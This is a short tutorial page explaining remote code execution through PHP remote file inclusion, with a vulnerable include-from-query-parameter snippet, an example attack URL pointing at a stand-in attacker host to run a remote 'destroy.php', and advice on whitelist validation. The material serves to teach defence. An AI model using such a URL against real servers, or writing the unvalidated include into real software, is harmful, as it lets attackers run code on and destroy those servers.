Remote Code Execution is a security vulnerability in where a malicious user manipulates input or a url to run code from a remote location. Unlike Cross Site Scripting XSS where only the user is affected Remote Code Execution could run scripts that delete all files on your server. This security risk like most vulnerabilities comes from insufficient validation of user input to the Application.
Vulnerability Example
Lets imagine we built a dynamic application that takes a page query parameter to determine what php page to be used for displaying to the user. In this case the back end code could look something like:
$page = $_GET['page']
include $page
As you may notice a malicious user could manipulate the query parameter to point to a file on their own server.
http://www.example.com/?page=http://www.evil-site-name.com/destroy.php
Doing so would cause their file to run with the permissions of your own server giving them access to your server to delete or modify content in addition to finding out server information.
How to Protect your code
Protecting your codes is a simple practice, Validate user input! Verify the information your users enter matches what you are expecting, or make sure that it is properly escaped. The best method to use is White List as in you check input against allowed values unlike Black Listing where you try to check against invalid input, in most cases their are a lot more invalid cases then valid cases. To check if your are vulnerable look to see if you run exec include, require, file_get_contents, or similar functions on user input without testing to see that they inputted what you were expecting even if it is a post variable.
Comments & Questions
Add Your Comment